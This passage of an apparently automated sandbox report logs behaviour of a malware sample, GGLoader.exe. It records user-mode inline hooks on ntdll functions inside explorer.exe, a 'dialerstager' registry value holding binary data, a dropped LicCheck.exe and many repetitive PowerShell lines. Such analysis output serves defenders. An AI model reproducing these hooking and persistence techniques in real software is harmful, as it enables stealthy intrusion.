Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Stores large binary data to the registry
Source: C:\Windows\System32\dialer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node dialerstager
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
